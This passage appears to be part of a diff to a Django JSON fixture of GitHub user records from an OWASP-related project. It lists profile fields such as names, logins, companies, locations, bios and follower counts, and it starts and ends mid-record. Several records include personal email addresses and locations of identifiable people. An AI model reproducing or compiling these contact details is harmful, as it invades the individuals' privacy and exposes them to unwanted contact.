"nest_updated_at": "2024-09-16T22:29:04.024Z", + "name": "永格天", + "login": "we684123", + "email": "we684123@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/22027801?v=4", + "company": "", + "location": "Taiwan", + "collaborators_count": 0, + "following_count": 71, + "followers_count": 49, + "public_gists_count": 4, + "public_repositories_count": 58, + "created_at": "2016-09-06T12:19:06Z", + "updated_at": "2024-08-24T07:19:23Z", + "node_id": "MDQ6VXNlcjIyMDI3ODAx", + "bio": "耕耘者的說 (づ¯ ³ ¯)づ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2677, + "fields": { + "nest_created_at": "2024-09-12T01:39:14.794Z", + "nest_updated_at": "2024-09-12T01:39:14.794Z", + "name": "Benjamin Otto", + "login": "otbe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3391052?v=4", + "company": "PRISMA European Capacity Platform GmbH", + "location": "Germany, Leipzig", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 26, + "public_gists_count": 7, + "public_repositories_count": 50, + "created_at": "2013-01-26T15:28:16Z", + "updated_at": "2024-07-15T21:55:35Z", + "node_id": "MDQ6VXNlcjMzOTEwNTI=", + "bio": "fullstack developer, cloud lover, OSS believer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2678, + "fields": { + "nest_created_at": "2024-09-12T01:39:17.265Z", + "nest_updated_at": "2024-09-12T01:39:17.265Z", + "name": "", + "login": "Sp33dy42", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/172411194?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-06-11T15:16:41Z", + "updated_at": "2024-06-11T15:16:52Z", + "node_id": "U_kgDOCkbJOg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2679, + "fields": { + "nest_created_at": "2024-09-12T01:39:22.487Z", + "nest_updated_at": "2024-09-12T01:39:22.487Z", + "name": "Merlin Ran", + "login": "merlinran", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1369696?v=4", + "company": "", + "location": "Toronto, ON", + "collaborators_count": 0, + "following_count": 64, + "followers_count": 27, + "public_gists_count": 4, + "public_repositories_count": 43, + "created_at": "2012-01-23T02:22:01Z", + "updated_at": "2024-08-16T15:37:13Z", + "node_id": "MDQ6VXNlcjEzNjk2OTY=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2680, + "fields": { + "nest_created_at": "2024-09-12T01:39:23.774Z", + "nest_updated_at": "2024-09-22T19:42:24.321Z", + "name": "Andrés Tito", + "login": "LaVibeX", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52439101?v=4", + "company": "@Rohde-Schwarz", + "location": "Munich, Germany", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2019-07-02T04:48:13Z", + "updated_at": "2024-08-30T11:33:51Z", + "node_id": "MDQ6VXNlcjUyNDM5MTAx", + "bio": "MSc Communication & Electronics @ TUM | Product Security & Embedded Security Enthusiast |\r\nHow Much Coffee Is Too Much Coffee? ☕\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2681, + "fields": { + "nest_created_at": "2024-09-12T01:39:52.697Z", + "nest_updated_at": "2024-09-12T01:39:52.697Z", + "name": "", + "login": "qiaozhi199", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/175908267?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-07-18T03:17:03Z", + "updated_at": "2024-07-18T03:17:09Z", + "node_id": "U_kgDOCnwlqw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2682, + "fields": { + "nest_created_at": "2024-09-12T01:39:56.505Z", + "nest_updated_at": "2024-09-12T01:39:56.505Z", + "name": "Michal Dobaczewski", + "login": "michal-futurice", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61732153?v=4", + "company": "@futurice", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-03-03T08:55:06Z", + "updated_at": "2023-10-30T11:18:37Z", + "node_id": "MDQ6VXNlcjYxNzMyMTUz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2683, + "fields": { + "nest_created_at": "2024-09-12T01:39:58.175Z", + "nest_updated_at": "2024-09-12T01:39:58.175Z", + "name": "Philipp Gortan", + "login": "mephinet", + "email": "mephinet@gmx.net", + "avatar_url": "https://avatars.githubusercontent.com/u/1292953?v=4", + "company": "", + "location": "Vienna, Austria", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 20, + "public_gists_count": 13, + "public_repositories_count": 76, + "created_at": "2011-12-29T18:50:09Z", + "updated_at": "2023-11-22T22:14:42Z", + "node_id": "MDQ6VXNlcjEyOTI5NTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2684, + "fields": { + "nest_created_at": "2024-09-12T01:40:02.373Z", + "nest_updated_at": "2024-09-14T19:18:00.050Z", + "name": "piotr.baltrukiewicz", + "login": "DaBalt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/149802014?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-11-03T13:52:34Z", + "updated_at": "2024-07-17T07:52:34Z", + "node_id": "U_kgDOCO3MHg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2685, + "fields": { + "nest_created_at": "2024-09-12T01:40:04.513Z", + "nest_updated_at": "2024-09-12T01:40:04.513Z", + "name": "Michael De Checchi", + "login": "rknj", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17745190?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 7, + "public_repositories_count": 16, + "created_at": "2016-03-09T14:01:29Z", + "updated_at": "2024-08-18T11:29:53Z", + "node_id": "MDQ6VXNlcjE3NzQ1MTkw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2686, + "fields": { + "nest_created_at": "2024-09-12T01:40:06.657Z", + "nest_updated_at": "2024-09-12T01:40:06.657Z", + "name": "", + "login": "jw1u1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/89261565?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-08-20T13:56:32Z", + "updated_at": "2024-04-17T15:02:37Z", + "node_id": "MDQ6VXNlcjg5MjYxNTY1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2687, + "fields": { + "nest_created_at": "2024-09-12T01:40:10.042Z", + "nest_updated_at": "2024-09-12T01:40:10.042Z", + "name": "Paul Ritzkat", + "login": "PaulRitzkat0110", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55187860?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-09-11T10:17:35Z", + "updated_at": "2024-09-06T10:54:05Z", + "node_id": "MDQ6VXNlcjU1MTg3ODYw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2688, + "fields": { + "nest_created_at": "2024-09-12T01:40:12.598Z", + "nest_updated_at": "2024-09-22T18:44:14.249Z", + "name": "", + "login": "guyscher2", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/124155741?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-02-01T11:47:16Z", + "updated_at": "2024-09-22T10:25:00Z", + "node_id": "U_kgDOB2Z3XQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2689, + "fields": { + "nest_created_at": "2024-09-12T01:40:16.382Z", + "nest_updated_at": "2024-09-12T01:40:16.382Z", + "name": "", + "login": "pragyanjeet", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46196761?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2018-12-27T15:21:46Z", + "updated_at": "2024-08-22T16:50:04Z", + "node_id": "MDQ6VXNlcjQ2MTk2NzYx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2690, + "fields": { + "nest_created_at": "2024-09-12T01:40:17.632Z", + "nest_updated_at": "2024-09-22T19:41:35.196Z", + "name": "", + "login": "antrix", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/204373?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2010-02-16T04:16:25Z", + "updated_at": "2024-08-08T07:33:19Z", + "node_id": "MDQ6VXNlcjIwNDM3Mw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2691, + "fields": { + "nest_created_at": "2024-09-12T01:40:22.717Z", + "nest_updated_at": "2024-09-22T19:41:00.950Z", + "name": "Thomas Schauer-Köckeis", + "login": "Gepardgame", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/75749982?v=4", + "company": "@Rohde-Schwarz", + "location": "", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2020-12-09T17:49:41Z", + "updated_at": "2024-09-13T14:19:27Z", + "node_id": "MDQ6VXNlcjc1NzQ5OTgy", + "bio": "Cybersecurity Student", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2692, + "fields": { + "nest_created_at": "2024-09-12T01:40:28.141Z", + "nest_updated_at": "2024-09-22T19:41:25.880Z", + "name": "Thomas Vitale", + "login": "ThomasVitale", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8523418?v=4", + "company": "Systematic A/S", + "location": "Denmark", + "collaborators_count": 0, + "following_count": 33, + "followers_count": 825, + "public_gists_count": 16, + "public_repositories_count": 148, + "created_at": "2014-08-22T12:52:56Z", + "updated_at": "2024-09-16T13:06:03Z", + "node_id": "MDQ6VXNlcjg1MjM0MTg=", + "bio": "Software Engineer | Author of \"Cloud Native Spring in Action\" | Spring, Java, Kubernetes | Cloud Native Development | Application & Software Security", + "is_hireable": false, + "twitter_username": "vitalethomas" + } +}, +{ + "model": "github.user", + "pk": 2693, + "fields": { + "nest_created_at": "2024-09-12T01:40:29.420Z", + "nest_updated_at": "2024-09-12T01:40:29.420Z", + "name": "", + "login": "samuvb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/141024884?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-07-31T10:04:46Z", + "updated_at": "2024-08-29T14:05:35Z", + "node_id": "U_kgDOCGfedA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2694, + "fields": { + "nest_created_at": "2024-09-12T01:40:37.395Z", + "nest_updated_at": "2024-09-14T19:18:03.948Z", + "name": "", + "login": "Najafov007", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/100145093?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2022-02-21T14:47:58Z", + "updated_at": "2024-08-28T05:52:00Z", + "node_id": "U_kgDOBfgXxQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2695, + "fields": { + "nest_created_at": "2024-09-12T01:40:43.777Z", + "nest_updated_at": "2024-09-12T01:40:43.777Z", + "name": "", + "login": "tatyana12345", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17821387?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2016-03-14T05:41:10Z", + "updated_at": "2024-09-11T08:23:51Z", + "node_id": "MDQ6VXNlcjE3ODIxMzg3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2696, + "fields": { + "nest_created_at": "2024-09-12T01:40:48.579Z", + "nest_updated_at": "2024-09-22T19:42:21.408Z", + "name": "Dependency-Track Bot", + "login": "dependencytrack-bot", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/106437498?v=4", + "company": "OWASP", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-05-28T13:31:23Z", + "updated_at": "2023-12-08T14:57:08Z", + "node_id": "U_kgDOBlgbeg", + "bio": "", + "is_hireable": false, + "twitter_username": "DependencyTrack" + } +}, +{ + "model": "github.user", + "pk": 2697, + "fields": { + "nest_created_at": "2024-09-12T01:41:46.964Z", + "nest_updated_at": "2024-09-12T01:41:46.964Z", + "name": "", + "login": "alptunga", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10005432?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 31, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2014-11-30T01:34:05Z", + "updated_at": "2024-08-22T21:05:51Z", + "node_id": "MDQ6VXNlcjEwMDA1NDMy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2698, + "fields": { + "nest_created_at": "2024-09-12T01:41:47.837Z", + "nest_updated_at": "2024-09-22T19:40:45.444Z", + "name": "Christian", + "login": "nhouck", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10012235?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2014-11-30T19:23:12Z", + "updated_at": "2023-04-05T22:12:16Z", + "node_id": "MDQ6VXNlcjEwMDEyMjM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2699, + "fields": { + "nest_created_at": "2024-09-12T01:41:59.261Z", + "nest_updated_at": "2024-09-12T01:41:59.261Z", + "name": "Sergei Ovchinnikov", + "login": "malchikserega", + "email": "sergey.o.a@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7830174?v=4", + "company": "Ingram Micro", + "location": "United States of America", + "collaborators_count": 0, + "following_count": 17, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 8, + "created_at": "2014-06-08T12:28:03Z", + "updated_at": "2024-06-05T21:04:23Z", + "node_id": "MDQ6VXNlcjc4MzAxNzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "malchikserega" + } +}, +{ + "model": "github.user", + "pk": 2700, + "fields": { + "nest_created_at": "2024-09-12T01:42:00.471Z", + "nest_updated_at": "2024-09-12T01:42:00.471Z", + "name": "", + "login": "guidola", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11554611?v=4", + "company": "", + "location": "Barcelona", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 5, + "public_gists_count": 6, + "public_repositories_count": 14, + "created_at": "2015-03-19T10:48:38Z", + "updated_at": "2024-05-23T13:16:43Z", + "node_id": "MDQ6VXNlcjExNTU0NjEx", + "bio": "All things Architecture | Jack of all trades", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2701, + "fields": { + "nest_created_at": "2024-09-12T01:42:08.466Z", + "nest_updated_at": "2024-09-12T01:42:08.466Z", + "name": "Dipak Kumar Das", + "login": "d1pakda5", + "email": "deepakdas288@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/17035598?v=4", + "company": "", + "location": "Bangalore", + "collaborators_count": 0, + "following_count": 100, + "followers_count": 39, + "public_gists_count": 26, + "public_repositories_count": 474, + "created_at": "2016-02-02T23:17:07Z", + "updated_at": "2024-08-22T11:40:47Z", + "node_id": "MDQ6VXNlcjE3MDM1NTk4", + "bio": "\r\n Senior Penetration Tester | Bug Bounty Hunter |\r\n\r\n\r\nHackerone: https://hackerone.com/d1pakda5\r\n", + "is_hireable": true, + "twitter_username": "d1pakdas" + } +}, +{ + "model": "github.user", + "pk": 2702, + "fields": { + "nest_created_at": "2024-09-12T01:42:17.775Z", + "nest_updated_at": "2024-09-12T01:42:17.775Z", + "name": "Curtis Ruck", + "login": "ruckc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1426401?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 48, + "followers_count": 10, + "public_gists_count": 14, + "public_repositories_count": 129, + "created_at": "2012-02-10T13:52:17Z", + "updated_at": "2024-08-15T11:19:00Z", + "node_id": "MDQ6VXNlcjE0MjY0MDE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2703, + "fields": { + "nest_created_at": "2024-09-12T01:42:22.441Z", + "nest_updated_at": "2024-09-12T01:42:22.441Z", + "name": "Vlad Fedosov", + "login": "StyleT", + "email": "vlad.fedosov@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1125900?v=4", + "company": "@epam", + "location": "Charlotte, NC, USA", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 27, + "public_gists_count": 6, + "public_repositories_count": 61, + "created_at": "2011-10-13T15:08:48Z", + "updated_at": "2024-07-08T13:27:32Z", + "node_id": "MDQ6VXNlcjExMjU5MDA=", + "bio": "", + "is_hireable": false, + "twitter_username": "vladlen_fedosov" + } +}, +{ + "model": "github.user", + "pk": 2704, + "fields": { + "nest_created_at": "2024-09-12T01:42:23.704Z", + "nest_updated_at": "2024-09-12T01:42:23.704Z", + "name": "Ramón Rial", + "login": "rrialq", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7503681?v=4", + "company": "", + "location": "Santiago de Compostela - La Coruña - Spain", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 5, + "public_repositories_count": 40, + "created_at": "2014-05-06T18:15:27Z", + "updated_at": "2024-07-22T09:55:25Z", + "node_id": "MDQ6VXNlcjc1MDM2ODE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2705, + "fields": { + "nest_created_at": "2024-09-12T01:42:26.217Z", + "nest_updated_at": "2024-09-12T01:42:26.217Z", + "name": "", + "login": "wargamez", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/76409?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2009-04-22T06:30:50Z", + "updated_at": "2024-08-29T19:47:18Z", + "node_id": "MDQ6VXNlcjc2NDA5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2706, + "fields": { + "nest_created_at": "2024-09-12T01:42:27.431Z", + "nest_updated_at": "2024-09-12T01:42:27.431Z", + "name": "Clement Trung", + "login": "ctrung", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68339?v=4", + "company": "", + "location": "Paris", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2009-03-29T12:19:26Z", + "updated_at": "2024-07-07T08:02:02Z", + "node_id": "MDQ6VXNlcjY4MzM5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2707, + "fields": { + "nest_created_at": "2024-09-12T01:42:28.731Z", + "nest_updated_at": "2024-09-12T01:42:30.437Z", + "name": "", + "login": "RazorTheBeaver", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/102231206?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-03-23T12:39:31Z", + "updated_at": "2022-04-15T13:20:14Z", + "node_id": "U_kgDOBhfspg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2708, + "fields": { + "nest_created_at": "2024-09-12T01:42:32.880Z", + "nest_updated_at": "2024-09-22T19:40:54.751Z", + "name": "Thomas Brüggemann", + "login": "bruegth", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1318408?v=4", + "company": "@WH-GROUP ", + "location": "DE, Ibbenbüren", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2012-01-10T13:06:46Z", + "updated_at": "2024-07-30T14:17:24Z", + "node_id": "MDQ6VXNlcjEzMTg0MDg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2709, + "fields": { + "nest_created_at": "2024-09-12T01:42:47.975Z", + "nest_updated_at": "2024-09-12T01:42:47.975Z", + "name": "Pedro Cordeiro", + "login": "PedroNCordeiro", + "email": "pncordeiro@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4098136?v=4", + "company": "", + "location": "Leiria, Portugal", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 9, + "public_gists_count": 1, + "public_repositories_count": 3, + "created_at": "2013-04-08T23:29:40Z", + "updated_at": "2023-06-29T12:52:17Z", + "node_id": "MDQ6VXNlcjQwOTgxMzY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2710, + "fields": { + "nest_created_at": "2024-09-12T02:07:21.854Z", + "nest_updated_at": "2024-09-12T02:07:21.854Z", + "name": "lukas.zmoginas", + "login": "Lzmog", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38206220?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 27, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 20, + "created_at": "2018-04-09T07:59:11Z", + "updated_at": "2024-08-05T17:36:46Z", + "node_id": "MDQ6VXNlcjM4MjA2MjIw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2711, + "fields": { + "nest_created_at": "2024-09-12T02:07:27.909Z", + "nest_updated_at": "2024-09-12T02:09:53.969Z", + "name": "", + "login": "SeniorTest", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48356010?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2019-03-08T13:21:26Z", + "updated_at": "2024-08-29T06:43:22Z", + "node_id": "MDQ6VXNlcjQ4MzU2MDEw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2712, + "fields": { + "nest_created_at": "2024-09-12T02:07:33.237Z", + "nest_updated_at": "2024-09-12T02:07:33.237Z", + "name": "Harry Bekkema", + "login": "hbekkema", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/85261211?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-06-02T22:40:40Z", + "updated_at": "2024-07-24T15:45:58Z", + "node_id": "MDQ6VXNlcjg1MjYxMjEx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2713, + "fields": { + "nest_created_at": "2024-09-12T02:07:38.222Z", + "nest_updated_at": "2024-09-12T02:07:38.222Z", + "name": "Christoph Sievers", + "login": "ctophs", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81007257?v=4", + "company": "@gulp2 at @union-investment", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 8, + "created_at": "2021-03-20T07:14:21Z", + "updated_at": "2022-06-13T07:26:24Z", + "node_id": "MDQ6VXNlcjgxMDA3MjU3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2714, + "fields": { + "nest_created_at": "2024-09-12T02:07:49.647Z", + "nest_updated_at": "2024-09-22T19:36:18.088Z", + "name": "Serg", + "login": "frost9i", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25299818?v=4", + "company": "", + "location": "Ukraine", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2017-01-23T13:38:45Z", + "updated_at": "2024-07-01T08:25:31Z", + "node_id": "MDQ6VXNlcjI1Mjk5ODE4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2715, + "fields": { + "nest_created_at": "2024-09-12T02:07:52.606Z", + "nest_updated_at": "2024-09-12T02:07:53.828Z", + "name": "Stefan Hacker", + "login": "hacst", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/237537?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 59, + "public_gists_count": 16, + "public_repositories_count": 47, + "created_at": "2010-04-05T23:50:03Z", + "updated_at": "2024-08-18T06:13:21Z", + "node_id": "MDQ6VXNlcjIzNzUzNw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2716, + "fields": { + "nest_created_at": "2024-09-12T02:08:06.814Z", + "nest_updated_at": "2024-09-12T02:08:06.814Z", + "name": "Enora Germond", + "login": "Ehoky", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/103035625?v=4", + "company": "", + "location": "Paris", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2022-04-05T09:58:02Z", + "updated_at": "2024-08-23T12:48:12Z", + "node_id": "U_kgDOBiQy6Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2717, + "fields": { + "nest_created_at": "2024-09-12T02:08:08.058Z", + "nest_updated_at": "2024-09-12T02:08:08.058Z", + "name": "", + "login": "kittyandrew", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45767571?v=4", + "company": "Manifold", + "location": "Kyiv, Ukraine", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2018-12-10T17:08:56Z", + "updated_at": "2024-08-06T20:20:53Z", + "node_id": "MDQ6VXNlcjQ1NzY3NTcx", + "bio": "Aspiring programmer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2718, + "fields": { + "nest_created_at": "2024-09-12T02:08:12.278Z", + "nest_updated_at": "2024-09-12T02:08:12.278Z", + "name": "Russ Michell", + "login": "phptek", + "email": "russ@theruss.com", + "avatar_url": "https://avatars.githubusercontent.com/u/478440?v=4", + "company": "Catalyst NZ", + "location": "Wellington, NZ", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 27, + "public_gists_count": 37, + "public_repositories_count": 69, + "created_at": "2010-11-12T06:50:54Z", + "updated_at": "2024-05-22T21:59:46Z", + "node_id": "MDQ6VXNlcjQ3ODQ0MA==", + "bio": "Expat pom living in .nz since ages ago. Software Developer. Will work with #green and #bitcoin for beer.", + "is_hireable": true, + "twitter_username": "therussdotcom" + } +}, +{ + "model": "github.user", + "pk": 2719, + "fields": { + "nest_created_at": "2024-09-12T02:08:14.359Z", + "nest_updated_at": "2024-09-12T02:08:14.359Z", + "name": "", + "login": "dnsbelgium-tech-cms", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/135347282?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-06-02T14:26:44Z", + "updated_at": "2024-06-21T09:10:51Z", + "node_id": "U_kgDOCBE8Ug", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2720, + "fields": { + "nest_created_at": "2024-09-12T02:08:18.113Z", + "nest_updated_at": "2024-09-12T02:08:18.113Z", + "name": "Dominic Allemann", + "login": "otakuu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5182070?v=4", + "company": "GetYourGuide", + "location": "Solothurn, Switzerland", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2013-08-07T12:45:38Z", + "updated_at": "2024-07-13T08:23:45Z", + "node_id": "MDQ6VXNlcjUxODIwNzA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2721, + "fields": { + "nest_created_at": "2024-09-12T02:08:20.673Z", + "nest_updated_at": "2024-09-12T02:08:20.673Z", + "name": "", + "login": "tnagel1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47357239?v=4", + "company": "", + "location": "", + 